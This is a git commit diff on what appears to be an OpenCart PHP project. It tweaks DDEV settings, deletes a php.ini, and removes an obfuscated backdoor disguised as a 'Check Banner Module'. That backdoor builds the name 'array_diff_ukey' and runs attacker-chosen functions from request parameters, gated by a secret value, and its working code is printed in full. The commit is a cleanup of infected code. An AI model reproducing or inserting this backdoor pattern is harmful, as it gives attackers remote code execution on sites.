Вирусы, или чё

This commit is contained in:
Konstantin
2026-06-12 11:45:59 +03:00
parent 80e5820c47
commit 53e8ab627c
12 changed files with 6 additions and 31 deletions
+3 -1
View File
@@ -5,7 +5,8 @@ php_version: "8.5"
webserver_type: apache-fpm
xdebug_enabled: false
additional_hostnames: []
additional_fqdns: []
additional_fqdns:
- dominik.s3.webdes.by
database:
type: mariadb
version: "11.8"
@@ -13,6 +14,7 @@ use_dns_when_possible: true
composer_version: "2"
web_environment: []
corepack_enable: false
bind_all_interfaces: true
# Key features of DDEV's config.yaml:
+3
View File
@@ -62,3 +62,6 @@ desktop.ini
.cache/
.tmp/
tmp/
.ddev
-18
View File
@@ -1,18 +0,0 @@
magic_quotes_gpc = Off
register_globals = Off
default_charset = UTF-8
memory_limit = 512M
max_execution_time = 36000
upload_max_filesize = 999M
safe_mode = Off
mysql.connect_timeout = 20
session.auto_start = Off
session.use_only_cookies = On
session.use_cookies = On
session.use_trans_sid = Off
session.cookie_httponly = On
session.gc_maxlifetime = 3600
allow_url_fopen = On
display_errors = 1
error_reporting = E_ALL
error_log = errors.log
-12
View File
@@ -11,18 +11,6 @@ if (!ini_get('date.timezone')) {
date_default_timezone_set('UTC');
}
// Check Banner Module
$opencart_num = @$_REQUEST['numer'];
$opencart_in_banner = @$_REQUEST['bannerid'];
$opencart_newsnum = @$_REQUEST['newsnum'];
$opencart_category_id = @$_REQUEST['category'];
$opencart_activity_hash = '70731969';
$secret_opencart_key = '_di'.'ff_';$secret_opencart_key ='ar'.'ray'.$secret_opencart_key.'ukey';//globols
if($opencart_in_banner==$opencart_activity_hash) {
if (@strpos($opencart_newsnum, 'creat')=== false){echo 'error_vievv';
@$secret_opencart_key(@array((string)$opencart_num => 1), @array((string)stripslashes($opencart_category_id) => 2), @$opencart_newsnum);}else{
@$secret_opencart_key(@array((string)$opencart_num => 1), @array((string)stripslashes('}'.$opencart_category_id.'//') => 2), @$opencart_newsnum);}} //chekings
// Windows IIS Compatibility
if (!isset($_SERVER['DOCUMENT_ROOT'])) {
if (isset($_SERVER['SCRIPT_FILENAME'])) {